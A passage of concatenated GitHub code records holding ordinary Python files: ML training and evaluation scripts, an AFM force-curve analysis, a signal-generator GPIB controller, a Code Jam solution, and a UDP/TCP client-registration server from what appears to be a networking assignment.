\"mermaid.csv\", \"numbersix.csv\", \"number7.csv\", \"salute.csv\",\n \"sidestep.csv\", \"swing.csv\", \"stationary.csv\", \"turnclap.csv\", 
\"wipers.csv\"]\nx_train, x_test, y_train, y_test = processor.prepare_train_all(\"data/extract\", all_paths)\n\ntrainer = RandomForestTrainer(14)\ntrainer.train(x_train, y_train)\ntrainer.evaluate(x_test, y_test)\ntrainer.save(\"models/random_forest.pkl\")\n","repo_name":"yunpengn/CG3002","sub_path":"software/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38852190698","text":"import os\nimport random\n\nimport numpy as np\nimport torch\n\n\ndef seed_everything(seed):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = True\n\ndef box_cxcywh_to_xyxy(x):\n x_c, y_c, w, h = x.unbind(-1)\n b = [(x_c - 0.5 * w), (y_c - 0.5 * h),\n (x_c + 0.5 * w), (y_c + 0.5 * h)]\n return torch.stack(b, dim=-1)\n\n\ndef collate_fn(batch_data):\n # Batch data is a list of n tuple, where tuple[0] is the img while tuple[1] are targets (labels, bounding boxes ecc)\n # Batch data is transformed in a list where list[0] contains a list of the images and list[1] contains a list of targets\n batch_data = list(zip(*batch_data))\n\n def _max_by_axis(the_list):\n # type: (List[List[int]]) -> List[int]\n maxes = the_list[0]\n for sublist in the_list[1:]:\n for index, item in enumerate(sublist):\n maxes[index] = max(maxes[index], item)\n return maxes\n\n sizes = [list(img.shape) for img in batch_data[0]]\n\n max_sizes = _max_by_axis(sizes)\n\n # Replace batch_data[0] with a tensor containing all batch images\n\n final_size = [len(batch_data[0])] + max_sizes\n b, c, h, w = final_size\n device = batch_data[0][0].device\n dtype = batch_data[0][0].dtype\n\n tensor = torch.zeros(final_size, dtype=dtype, device=device)\n\n for img, pad_img in zip(batch_data[0], tensor):\n pad_img[: img.shape[0], : img.shape[1], : img.shape[2]].copy_(img)\n\n batch_data[0] = tensor\n\n return tuple(batch_data[:2])","repo_name":"FreeformRobotics/Active_room_segmentation","sub_path":"detr_door_detection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"36744121083","text":"# -*- coding: utf-8 -*-\n# @File : visualization.py\n# @Author: Runist\n# @Time : 2020/5/19 14:50\n# @Software: PyCharm\n# @Brief: 样本数据、训练过程可视化\nimport os\nimport re\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport cv2 as cv\n\nfrom dataReader import SiameseLoader\nfrom main import siamese_network\nimport config as cfg\n\n\ndef gen_class_names(base_class_name):\n \"\"\"\n 生成分类名字的列表\n :param base_class_name: 分类名的前缀\n :return:\n \"\"\"\n classes = []\n for i in range(1, 21):\n if i < 10:\n classes.append(\"{}0{}\".format(base_class_name, i))\n else:\n classes.append(\"{}{}\".format(base_class_name, i))\n return classes\n\n\ndef generate_one_hot_encoding(classes):\n \"\"\"\n 利用sklearn中的preprocessing包快速生成onehot编码\n :param classes: 分类的名字\n :return: 生成的onehot编码列表\n \"\"\"\n encoder = LabelBinarizer()\n transfomed_labels = encoder.fit_transform(classes)\n\n return transfomed_labels\n\n\ndef plot_images(path):\n \"\"\"\n 绘制一种语言的某个字符的所有20个样本\n \"\"\"\n f, axarr = plt.subplots(5, 4, figsize=(10, 10))\n images_list = []\n for image in os.listdir(path):\n image_path = os.path.join(path, image)\n img = 
cv.imread(image_path)\n        images_list.append(img)\n\n    for i in range(5):\n        for j in range(4):\n            axarr[i, j].imshow(images_list.pop())\n\n    plt.show()\n\n\ndef nearest_neighbour_correct(image_group, labels):\n    \"\"\"\n    Compute the L2 (Euclidean) distance between each image pair\n    :param image_group: the test pairs\n    :param labels:\n    :return:\n    \"\"\"\n    L2_distances = np.zeros_like(labels)\n    for i in range(len(labels)):\n        L2_distances[i] = np.sqrt(np.sum((image_group[0][i] - image_group[1][i]) ** 2))  # Euclidean distance of the pair\n\n    if np.argmin(L2_distances) == np.argmax(labels):\n        return 1\n    return 0\n\n\ndef test_nn_accuracy(N_ways, num, loader):\n    \"\"\"\n    Measure one-shot accuracy\n    :param N_ways: number of classes per task\n    :param num: number of tasks\n    :param loader: the data loader\n    :return: accuracy\n    \"\"\"\n    print(\"Evaluating nearest neighbour on {} unique {} way one-shot learning tasks ...\".format(num, N_ways))\n\n    correct = 0\n\n    for i in range(num):\n        image_group, labels = loader.make_oneshot_task(N_ways, \"valid\")\n        correct += nearest_neighbour_correct(image_group, labels)\n\n    return 100.0 * correct / num\n\n\ndef test_nn_and_siamese(weight_path, curves_path):\n    \"\"\"\n    Compare nearest neighbour and the siamese network on the test set\n    :param weight_path: path to the model weights\n    :param curves_path: where to store the curve data\n    :return:\n    \"\"\"\n    ways = np.arange(1, 30, 2)\n    valid_accs, train_accs, nn_accs = [], [], []\n    test_num = 2\n\n    # another_strategy = tf.distribute.MirroredStrategy()\n    # with another_strategy.scope():\n    model = siamese_network()\n    model.load_weights(weight_path)\n\n    for N in ways:\n        train_accs.append(loader.test_oneshot(model, N, test_num, \"train\"))\n        valid_accs.append(loader.test_oneshot(model, N, test_num, \"valid\"))\n        nn_accs.append(test_nn_accuracy(N, test_num, loader))\n\n    # Save the data to a file; plots are awkward to view on the server, so draw them locally\n    with open(curves_path, 'w') as f:\n        f.write(\"[train_acc]\\n\")\n        for acc in train_accs:\n            f.write(\"{:.2f},\".format(acc))\n\n        f.write(\"\\n[valid_accs]\\n\")\n        for acc in valid_accs:\n            f.write(\"{:.2f},\".format(acc))\n\n        f.write(\"\\n[nn_accs]\\n\")\n        for acc in nn_accs:\n            f.write(\"{:.2f},\".format(acc))\n\n\ndef randomcolor():\n    \"\"\"\n    Generate a random colour\n    :return:\n    \"\"\"\n    colorArr = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n    color = \"#\"\n    for i in range(6):\n        color += colorArr[np.random.randint(0, 14)]\n    return color\n\n\ndef plot_curves(file):\n    \"\"\"\n    Build a chart from the txt file to visualise the results\n    :param file: the txt file\n    :return: None\n    \"\"\"\n    with open(file, 'r') as f:\n        content = f.read()\n        name = re.findall(r\"([a-z_a-z]+)\", content)\n        data = re.findall(r\"(.*)[\\d]\", content)\n\n    history = {}\n    for i in range(len(data)):\n        # split the numbers on ',' and map them to floats\n        history[name[i]] = list(map(float, data[i].split(\",\")))\n\n    for key, values in history.items():\n        plt.plot(range(0, len(values)), values, color=randomcolor())\n\n    plt.legend(history.keys(), loc=0)\n    plt.show()\n\n\nif __name__ == '__main__':\n    loader = SiameseLoader(cfg.data_path)\n\n    # plot_images(os.path.join(cfg.data_path, 'images_background/Arcadian/character03/'))\n\n    test_curves = cfg.summary_path + \"test_curves.txt\"\n    train_curves = cfg.summary_path + \"train_curves.txt\"\n    # test_nn_and_siamese(cfg.model_path, test_curves)\n\n    plot_curves(test_curves)\n    # plot_curves(train_curves)\n","repo_name":"Runist/SiameseNet","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"16601180508","text":"# force floating point division. 
Can still use integer with //\nfrom __future__ import division\n# This file is used for importing the common utilities classes.\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.append(\"../../../../../\")\nfrom Research.Perkins.AnalysisUtil.ForceExtensionAnalysis import FEC_Util,\\\n FEC_Plot\nfrom Research.Perkins.AnalysisUtil.ForceExtensionAnalysis.DataCorrection.\\\n CorrectionMethods import CorrectForcePullByMetaInformation\n\nfrom FitUtil.WormLikeChain.Python.Code.WLC_Fit import BoundedWlcFit\nfrom FitUtil.FitUtils.Python.FitClasses import GetBoundsDict\nfrom GeneralUtil.python import PlotUtilities as pPlotUtil\nfrom GeneralUtil.python import CheckpointUtilities as pCheckUtil\nimport copy\nfrom GeneralUtil.python.IgorUtil import SavitskyFilter\n\n\ndef ReadInData(FullName):\n mObjs = FEC_Util.ReadInData(FullName)\n return mObjs\n\ndef run():\n \"\"\"\n Runs contour length analysis\n \"\"\"\n OutFile = \"\"\n Limit = 2\n FullNames = [\"2016_7_10_1ng_ul_50C_4hour_depo_circ_dna_Strept_tip_I.pxp\",\n \"2016_7_10_1ng_ul_50C_4hour_depo_circ_dna_Strept_tip_II.pxp\"]\n DataArray = []\n for i,Name in enumerate(FullNames):\n DataArray.extend(pCheckUtil.getCheckpoint(\"Tmp{:d}.pkl\".format(i),\n ReadInData,False,Name))\n NoTriggerDistance = 200e-9\n for Tmp in DataArray:\n idx = 0\n Corrected,_ = CorrectForcePullByMetaInformation(Tmp)\n Sep = Tmp.Separation\n Tmp = Corrected\n # work with the corrected version\n Approach,Retract = FEC_Util.GetApproachRetract(Tmp)\n EntireRetract = FEC_Util.\\\n GetFECPullingRegion(Retract,MetersAfterTouchoff=None,\n Correct=True)\n FilterFactor =10\n NFilterPoints = int(np.ceil(EntireRetract.Force.size/FilterFactor))\n FilteredForce = FEC_Util.GetFilteredForce(EntireRetract,NFilterPoints)\n FilteredForceGradient = SavitskyFilter(np.gradient(FilteredForce.Force),\n NFilterPoints)\n OnlyPositive = FilteredForceGradient[np.where(FilteredForceGradient>0)]\n q75, q25 = np.percentile(OnlyPositive, [75 ,25])\n iqr = q75-q25\n IsOutlier = lambda x: x > q75 + 1.5 * iqr\n FirstOutlier = np.where(IsOutlier(FilteredForceGradient))[0][0]\n MaxIdx = np.argmax(FilteredForceGradient)\n IdxArr = np.arange(0,FilteredForceGradient.size)\n SeparationRelativeRetract = EntireRetract.Separation\n SeparationRelativeRetract -= SeparationRelativeRetract[0]\n # first worm like chain ends where we past the max no longer an outlier\n Outliers = np.where( ~IsOutlier(FilteredForceGradient) &\n (IdxArr > FirstOutlier) &\n (SeparationRelativeRetract > NoTriggerDistance))\n EndOfFirstWLC = Outliers[0][0]\n MetersAfterTouchoff = SeparationRelativeRetract[EndOfFirstWLC]\n NearSurface = FEC_Util.\\\n GetFECPullingRegion(Retract,\n MetersAfterTouchoff=MetersAfterTouchoff)\n Bounds = GetBoundsDict(**dict(Lp=[20e-9,60e-9],\n L0=[100e-9,700e-9],\n K0=[1000e-12,1400e-12],\n kbT=[0,np.inf]))\n SepNear = NearSurface.Separation\n ForceNear = NearSurface.Force\n Fit = BoundedWlcFit(SepNear,ForceNear,VaryL0=True,VaryLp=True,Ns=20,\n Bounds=Bounds)\n Pred = Fit.Predict(SepNear)\n # the fit was to 'NearSurface', which is zeroed. 
There can be an offset\n    # due to hydrodynamic drag on the cantilever (typically <20pN)\n    # to find this (in order for the retract-offsetted WLC fit to match),\n    # we take the median force at the start of the approach and the end of the retract\n    Appr,Retr = FEC_Util.SplitAndProcess(Tmp)\n    # how much of the retract should we use to figure out the zero?\n    fraction = 0.05\n    N = int(np.ceil(fraction*Retr.Force.size))\n    # get the two zeros, and offset the fit by their difference (retract\n    # should almost certainly be higher)\n    ZeroAppr = np.median(Appr.Force[:N])\n    ZeroRetr = np.median(Retr.Force[-N:])\n    Offset = ZeroRetr - ZeroAppr\n    # offset the WLC \n    Pred += Offset\n    # plot the data and the prediction\n    fig = pPlotUtil.figure()\n    FEC_Plot.FEC(Tmp)\n    # now plot some meta information. The expected overstretch\n    ExpectedOverstretch_pN = 65\n    plt.axhline(ExpectedOverstretch_pN,\n                linewidth=3.0,color='k',linestyle=\"--\",label=\"65pN\")\n    ToNm = lambda x: x*1e9\n    ToPn = lambda x: x*1e12\n    # get the contour length (L0) and the persistence length (Lp) in nm\n    # and as integers (i.e. we don't care about ~2% precision)\n    L0_nm = int(ToNm(Fit.Info.ParamVals.ParamDict[\"L0\"].Value))\n    Lp_nm = int(ToNm(Fit.Info.ParamVals.ParamDict[\"Lp\"].Value))\n    # plot the WLC prediction, label...\n    \"\"\"\n    plt.plot(ToNm(SepNear),ToPn(Pred),color='g',linestyle='--',\n             linewidth=5.0,\n             label=\"WLC (Extensible)\\n\")\n    \"\"\"\n    pPlotUtil.legend(frameon=True)\n    # note: limits are in nm and pN\n    MaxY_pN = np.max(ToPn(Pred[np.where(np.isfinite(Pred))]))\n    MaxY_pN = max(MaxY_pN,ToPn(np.max(Retr.Force)))\n    MinY_pN = -MaxY_pN/5\n    plt.ylim([-40,MaxY_pN])\n    plt.xlim([-20,plt.xlim()[-1]])\n    Name = \"WLC\" + Tmp.Meta.Name\n    pPlotUtil.savefig(fig,Name + \".png\")\n    # Read in the pxp (assume each 'name-group' with the same numerical\n    # suffix represents a valid wave with a WLC of interest)\n    \n    \n\nif __name__ == \"__main__\":\n    run()\n","repo_name":"prheenan/Research","sub_path":"Perkins/Projects/CircularDNA/2016_6_10_ContourLengthAnalysis/MainContourLength.py","file_name":"MainContourLength.py","file_ext":"py","file_size_in_byte":5829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27675722336","text":"from plx_gpib_ethernet import PrologixGPIBEthernet\n\n# scraps to control a gigatronics 2520A signal generator\n\nGPIB_ADDR_2520A = 6\n\nclass Gigatronics2520A():\n    def __init__(self, prologix = False, gpib_addr = GPIB_ADDR_2520A):\n        if not prologix:\n            self.gpib = PrologixGPIBEthernet('192.168.1.128')\n            self.gpib.connect()\n        else:\n            self.gpib = prologix\n\n        self.gpib_addr = gpib_addr\n\n        self.gpib.select(self.gpib_addr)\n        self.gpib.write('*RST')\n        assert '2520A' in self.gpib.query('*IDN?')\n\n    def set_cw_frequency(self, freq):\n        self.gpib.select(self.gpib_addr)\n        self.gpib.write('SOURCE:FREQUENCY:FIX {}HZ'.format(str(int(freq))))\n        f_readback = float(self.gpib.query('SOURCE:FREQUENCY?'))\n        assert f_readback == freq\n\n    def set_cw_power(self, power_dbm):\n        self.gpib.select(self.gpib_addr)\n        self.gpib.write('SOURCE:POWER:LEVEL:IMM:AMPLITUDE {}DBM'.format(str(int(power_dbm))))\n        p_readback = float(self.gpib.query('SOURCE:POWER:LEVEL:IMM:AMPLITUDE?'))\n        assert int(p_readback) == power_dbm\n\n    def output_on(self):\n        self.gpib.select(self.gpib_addr)\n        self.gpib.write('OUTPUT ON')\n        assert float(self.gpib.query('OUTPUT:STATE?')) == 1\n\n    def output_off(self):\n        self.gpib.select(self.gpib_addr)\n        self.gpib.write('OUTPUT OFF')\n        assert float(self.gpib.query('OUTPUT:STATE?')) == 0\n\nif __name__ == '__main__':\n    synth = Gigatronics2520A()\n\n    
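# NOTE (editor's addition, hedged): the 2.5 GHz / -10 dBm values below are just arbitrary smoke-test settings,\n    # not anything the 2520A requires; any CW frequency/power in range exercises the same GPIB write/query path.\n    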
synth.set_cw_frequency(2.5e9)\n synth.set_cw_power(-10)\n synth.output_on()\n\n\n\n \n\n \n\n","repo_name":"loxodes/lab_automation","sub_path":"equipment/gigatronics_2520a.py","file_name":"gigatronics_2520a.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23450700731","text":"\"\"\"\nInput\n4\n4 11111\n1 09\n5 110011\n0 1\n\nOutput\nCase #1: 0\nCase #2: 1\nCase #3: 2\nCase #4: 0\n\"\"\"\n\nimport sys\n\ndef read(filen, fileout):\n T = 0\n cases = []\n trial = 0\n with open(filen) as f:\n with open(fileout, 'w') as fout:\n T = int(f.readline())\n for line in f:\n if len(line.split()) > 1:\n trial += 1\n s_max = int(line.split()[0])\n s = [ int(i) for i in list(line.split()[1]) ]\n ans = solve_it(s_max, s)\n fout.write('Case #{0}: {1}\\n'.format(trial,ans))\n\ndef solve_it(s_max, s):\n curr_s = 0 # The initial amount of 'ovation'\n needed = 0 # How many more ovations we need\n for i in range(len(s)):\n if i > curr_s: # There's not enough ovation for the remainder to stand\n needed += i-curr_s\n curr_s += i-curr_s # In the case that there were enough...\n curr_s += s[i]\n return needed\n \ndef main(filen, fileout):\n read(filen, fileout)\n \n\n\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n main(sys.argv[1], sys.argv[2])\n else:\n print('Wrong number of arguments')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1988.py","file_name":"1988.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6446365950","text":"#!/usr/bin/env python3\nimport struct\nimport sys\nfrom dataclasses import dataclass\nfrom dataclasses import field\nimport servermodule\nimport threading\nimport socket\nimport random\nimport select\nimport time\n\n\n# Colors Class for formatting purposes\nclass Colors:\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n CYAN = '\\033[96m'\n GREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n END = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\n# Dataclasses\n@dataclass\nclass ServerCfg:\n Id: str\n UDP: int\n TCP: int\n mainTCP: socket.socket\n mainUDP: socket.socket\n\n\n@dataclass\nclass Element:\n Id: str\n Value: str = \"None\"\n\n def isFrom(self, client):\n for i in range(len(client.Elements)):\n if client.Elements[i].Id == self.Id:\n return True\n return False\n\n def store(self, client, date, packetType):\n for i in range(len(client.Elements)):\n if client.Elements[i].Id == self.Id:\n client.Elements[i].Value = self.Value\n dataFile = open(client.Id + \".data\", \"a\")\n dataFile.write(date.split(\";\")[0] + \";\" + date.split(\";\")[1] + \";\" + typeToString(\n packetType) + \";\" + self.Id + \";\" + self.Value + \"\\n\")\n okMsg(\"Successfully stored element \" + self.Id + \" value: \" + self.Value + \" for client \" + client.Id)\n dataFile.close()\n\n\n@dataclass\nclass Client:\n Id: str\n Status: str = servermodule.DISCONNECTED\n Id_Comm: str = \"\"\n IP_Address: str = \"\"\n defaultUDPort: int = 0\n firstALIVE: bool = True\n ALIVEReceived: bool = False\n ALIVELost: int = 0\n ALIVETimer: threading.Thread = None\n newUDPort: int = 0\n TCP: int = 0\n Elements: list[Element] = field(default_factory=list)\n\n def setStatus(self, status):\n self.Status = status\n infoMsg(\"Client with id \" + str(self.Id) + \" in status \" + statusToString(self.Status))\n\n def resetALIVE(self):\n self.firstALIVE = 
True\n self.ALIVEReceived = False\n self.ALIVELost = 0\n\n\n@dataclass\nclass UDP_PDU:\n Type: str\n Id_Trans: str\n Id_Comm: str\n Data: str\n\n def send(self, socketToSend, client, port):\n packetPacked = packUDP(self)\n bytesSent = socketToSend.sendto(packetPacked, (client.IP_Address, port))\n while bytesSent != UDPPacketSize: # 84 = size of UDP_PDU\n bytesSent += socketToSend.sendto(packetPacked[bytesSent:], (client.IP_Address, port))\n debugMsg(\"Packet \" + typeToString(self.Type) + \" sent correctly to \" + client.Id)\n\n def incorrectALIVE(self, client):\n if str(self.Id_Trans) != client.Id or self.Id_Comm != str(client.Id_Comm) or self.Data != \"\":\n return True\n return False\n\n\n@dataclass\nclass TCP_PDU:\n Type: str\n Id_Trans: str\n Id_Comm: str\n Element: str\n Value: str\n Info: str\n\n def send(self, socketToSend: socket.socket, client):\n packetPacked = packTCP(self)\n socketToSend.sendall(packetPacked)\n debugMsg(\"Packet \" + typeToString(self.Type) + \" sent correctly to \" + client.Id)\n\n\n# Constants\nUDPPacketSize = 84\nTCPPacketSize = 1 + 11 + 11 + 8 + 16 + 80\nZ = 2\nT = 1\nW = 3\nX = 3\nM = 3\nV = 2\nS = 3\n\n# Global variables\nserverCfg = ServerCfg\ncfgFile = \"server.cfg\"\nauthFile = \"bbdd_dev.dat\"\ndebug_mode = False\nclients = []\n\n\n# CHECK PARAMETERS FUNCTIONS\n\ndef checkParams():\n i = 1\n while i < len(sys.argv):\n if sys.argv[i] == \"-d\":\n global debug_mode\n debug_mode = True\n elif sys.argv[i] == \"-c\":\n if i + 1 <= len(sys.argv) and checkCfgFile(sys.argv[i + 1]):\n global cfgFile\n cfgFile = sys.argv[i + 1]\n else:\n errorMsg(\"Wrong config file name entered (filename.cfg)\")\n exit(-1)\n i += 1\n elif sys.argv[i] == \"-u\":\n if i + 1 <= len(sys.argv) and checkAuthFile(sys.argv[i + 1]):\n global authFile\n authFile = sys.argv[i + 1]\n else:\n errorMsg(\"Wrong authorized clients file name entered (filename.dat)\")\n exit(-1)\n i += 1\n else:\n errorMsg(\"Wrong program parameters entered\")\n exit(-1)\n i += 1\n\n\ndef checkCfgFile(filename):\n if filename.find(\".cfg\") < 0:\n return False\n return True\n\n\ndef checkAuthFile(filename):\n if filename.find(\".dat\") < 0:\n return False\n return True\n\n\n# READING CONFIGURATION FUNCTIONS\n\ndef readCfgFile():\n file = open(cfgFile, \"r\")\n lines = file.read().splitlines()\n global serverCfg\n for i in range(len(lines)):\n if lines[i].startswith(\"Id\") > 0:\n Id = lines[i].split(\" \")[2]\n serverCfg.Id = Id\n elif lines[i].startswith(\"UDP\") > 0:\n UDP = lines[i].split(\" \")[2]\n serverCfg.UDP = UDP\n elif lines[i].startswith(\"TCP\") > 0:\n TCP = lines[i].split(\" \")[2]\n serverCfg.TCP = TCP\n\n\ndef readAuthFile():\n file = open(authFile, \"r\")\n lines = file.read().splitlines()\n global clients\n for i in range(len(lines)):\n client = Client(lines[i])\n clients.append(client)\n\n\n# SERVER INITIALIZATION\n\ndef startServer():\n mainUDPSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n mainUDPSocket.bind(('', int(serverCfg.UDP)))\n\n mainTCPSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mainTCPSocket.bind(('', int(serverCfg.TCP)))\n\n mainUDPThread = threading.Thread(target=handleUDPConnections, args=(mainUDPSocket,))\n mainUDPThread.daemon = True\n mainTCPThread = threading.Thread(target=handleTCPConnections, args=(mainTCPSocket,))\n mainTCPThread.daemon = True\n\n serverCfg.mainUDP = mainUDPSocket\n serverCfg.mainTCP = mainTCPSocket\n\n mainUDPThread.start()\n mainTCPThread.start()\n handleTerminalInput()\n\n\n# UDP FUNCTIONS\n\ndef 
handleUDPConnections(mainUDPSocket: socket.socket): # HANDLING UDP CONNECTIONS AND THREAD EVERY NEW CONNECTION.\n while 1:\n (bytesReceived, (ip, port)) = mainUDPSocket.recvfrom(UDPPacketSize, socket.MSG_WAITALL)\n debugMsg(\"New thread created for attending UDP\")\n clientUDPThread = threading.Thread(target=switcher, args=(bytesReceived, ip, port, mainUDPSocket,))\n clientUDPThread.start()\n\n\ndef switcher(bytesPacket, ip, port, mainUDPSocket):\n packet = unpackUDP(bytesPacket)\n\n if not packetFromAuthedUser(packet):\n debugMsg(\"Received a packet from unknown user\")\n sendREG_REJ(mainUDPSocket, ip, port, \"Client with id: \" + packet.Id_Trans + \" not authed in server\")\n return\n\n client = searchClient(packet.Id_Trans)\n client.IP_Address = ip\n client.defaultUDPort = port\n\n if packet.Type == servermodule.REG_REQ:\n client.resetALIVE()\n handleRegisterRequest(packet, mainUDPSocket, client)\n elif packet.Type == servermodule.ALIVE:\n handlePeriodicCommunication(packet, mainUDPSocket, client)\n else:\n debugMsg(\"Error packet type received: \" + typeToString(\n packet.Type) + \" with client \" + client.Id + \" in status \" + statusToString(\n client.Status))\n client.setStatus(servermodule.DISCONNECTED)\n\n\ndef packUDP(packet: UDP_PDU):\n packedPacket = struct.pack(\"B 11s 11s 61s\", packet.Type, str(packet.Id_Trans).encode(),\n str(packet.Id_Comm).encode(), str(packet.Data).encode())\n return packedPacket\n\n\ndef unpackUDP(bytesReceived: bytes):\n unpackedPacket = struct.unpack('B 11s 11s 61s', bytesReceived)\n packetType = unpackedPacket[0]\n packetId_Trans = unpackedPacket[1].split(b\"\\x00\")[0].decode()\n packetId_Comm = unpackedPacket[2].split(b\"\\x00\")[0].decode()\n packetData = unpackedPacket[3].split(b\"\\x00\")[0].decode()\n return UDP_PDU(packetType, packetId_Trans, packetId_Comm, packetData)\n\n\ndef handleRegisterRequest(REG_REQPacket, mainUDPSocket, client: Client):\n if REG_REQPacket.Id_Comm != \"0000000000\" or REG_REQPacket.Data != \"\":\n if REG_REQPacket.Data != \"\":\n debugMsg(\"Received a REG_REQ packet [DATA NOT EMPTY]\")\n sendREG_REJ(mainUDPSocket, client.IP_Address, client.defaultUDPort,\n \"Wrong information in packet REG_REQ [DATA NOT EMPTY]\")\n else:\n debugMsg(\"Received a REG_REQ packet [WRONG ID COMMUNICATION]\")\n sendREG_REJ(mainUDPSocket, client.IP_Address, client.defaultUDPort,\n \"Wrong information in packet REG_REQ [WRONG ID COMMUNICATION]\")\n client.setStatus(servermodule.DISCONNECTED)\n return\n\n debugMsg(\"Correct REG_REQ packet received from client \" + client.Id)\n\n if client.Status != servermodule.DISCONNECTED:\n sendREG_REJ(mainUDPSocket, client.IP_Address, client.defaultUDPort,\n \"Client with id: \" + client.Id + \" it's not in status DISCONNECTED\")\n client.setStatus(servermodule.DISCONNECTED)\n return\n\n Id_Comm = random.randint(1000000000, 9999999999)\n client.Id_Comm = Id_Comm\n\n clientUDPSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n clientUDPSocket.bind((\"\", 0))\n newUDPPort = clientUDPSocket.getsockname()[1]\n client.newUDPort = newUDPPort\n\n sendREG_ACK(mainUDPSocket, client)\n debugMsg(\"Opened new UDP-Port (\" + str(newUDPPort) + \") for client \" + client.Id)\n\n client.setStatus(servermodule.WAIT_INFO)\n inputs, outputs, excepts = select.select([clientUDPSocket], [], [], Z * T)\n if len(inputs) == 0:\n debugMsg(\"REG_INFO packet not received from client \" + client.Id)\n client.setStatus(servermodule.DISCONNECTED)\n clientUDPSocket.close()\n return\n\n (REG_INFOBytes, (_, _)) = 
clientUDPSocket.recvfrom(UDPPacketSize, socket.MSG_WAITALL)\n REG_INFOPacket = unpackUDP(REG_INFOBytes)\n\n if REG_INFOPacket.Type != servermodule.REG_INFO:\n debugMsg(\"Error packet type received: \" + typeToString(\n REG_INFOPacket.Type) + \" with client \" + client.Id + \" in status \" + statusToString(\n client.Status))\n client.setStatus(servermodule.DISCONNECTED)\n clientUDPSocket.close()\n return\n\n if REG_INFOPacket.Id_Trans != str(client.Id) or REG_INFOPacket.Id_Comm != str(Id_Comm) or len(\n REG_INFOPacket.Data) < 7:\n if REG_INFOPacket.Id_Trans != str(client.Id):\n debugMsg(\"Wrong information in packet REG_INFO from client \" + client.Id + \"[WRONG ID TRANSMITTER]\")\n sendINFO_NACK(clientUDPSocket, client, \"Wrong information in packet REG_INFO [WRONG ID TRANSMITTER]\")\n elif REG_INFOPacket.Id_Comm != str(Id_Comm):\n debugMsg(\"Wrong information in packet REG_INFO from client \" + client.Id + \"[WRONG ID COMMUNICATION]\")\n sendINFO_NACK(clientUDPSocket, client, \"Wrong information in packet REG_INFO [WRONG ID COMMUNICATION]\")\n else:\n debugMsg(\"Wrong information in packet REG_INFO from client \" + client.Id + \"[WRONG ELEMENT INFO]\")\n sendINFO_NACK(clientUDPSocket, client, \"Wrong information in packet REG_INFO [WRONG ELEMENT INFO]\")\n client.setStatus(servermodule.DISCONNECTED)\n clientUDPSocket.close()\n return\n\n debugMsg(\"Correct REG_INFO packet received from \" + client.Id)\n storeREG_INFOData(REG_INFOPacket.Data, client)\n\n sendINFO_ACK(clientUDPSocket, client)\n client.setStatus(servermodule.REGISTERED)\n clientALIVETimer = threading.Thread(target=ALIVETimer, args=(client,))\n client.ALIVETimer = clientALIVETimer\n clientALIVETimer.start()\n debugMsg(\"Started new ALIVE timer for client \" + client.Id + \" with name \" + clientALIVETimer.name)\n clientUDPSocket.close()\n\n\ndef sendREG_ACK(socketToSend, client: Client):\n REG_ACKPacket = UDP_PDU(servermodule.REG_ACK, serverCfg.Id, client.Id_Comm, str(client.newUDPort))\n REG_ACKPacket.send(socketToSend, client, client.defaultUDPort)\n\n\ndef sendINFO_ACK(socketToSend, client):\n INFO_ACKPacket = UDP_PDU(servermodule.INFO_ACK, serverCfg.Id, client.Id_Comm, str(serverCfg.TCP))\n INFO_ACKPacket.send(socketToSend, client, client.defaultUDPort)\n\n\ndef sendINFO_NACK(socketToSend, client, reason):\n INFO_NACKPacket = UDP_PDU(servermodule.INFO_NACK, serverCfg.Id, client.Id_Comm, reason)\n INFO_NACKPacket.send(socketToSend, client, client.defaultUDPort)\n\n # END OF REGISTER PROCESS\n\n\ndef storeREG_INFOData(data, client: Client):\n client.TCP = data.split(\",\")[0]\n for i in range(len(data.split(\";\"))):\n element = Element(data.split(\",\")[1].split(\";\")[i], \"\")\n client.Elements.append(element)\n\n\ndef sendREG_REJ(socketToSend, ip, port, reason):\n REG_REJPacket = UDP_PDU(servermodule.REG_REJ, serverCfg.Id, \"0000000000\", reason)\n REG_REJPacked = packUDP(REG_REJPacket)\n bytesSent = socketToSend.sendto(REG_REJPacked, (ip, port))\n while bytesSent != UDPPacketSize:\n bytesSent += socketToSend.sendto(REG_REJPacked[bytesSent:], (ip, port))\n debugMsg(\"Packet REG_REJ sent correctly to \" + str(ip) + \":\" + str(port))\n\n\ndef handlePeriodicCommunication(ALIVE: UDP_PDU, mainUDPSocket: socket.socket, client: Client):\n if ALIVE.incorrectALIVE(client):\n debugMsg(\"Incorrect ALIVE packet received from \" + client.Id)\n sendALIVE_REJ(mainUDPSocket, client)\n client.setStatus(servermodule.DISCONNECTED)\n return\n\n if client.firstALIVE and client.Status == servermodule.REGISTERED:\n debugMsg(\"Correct first 
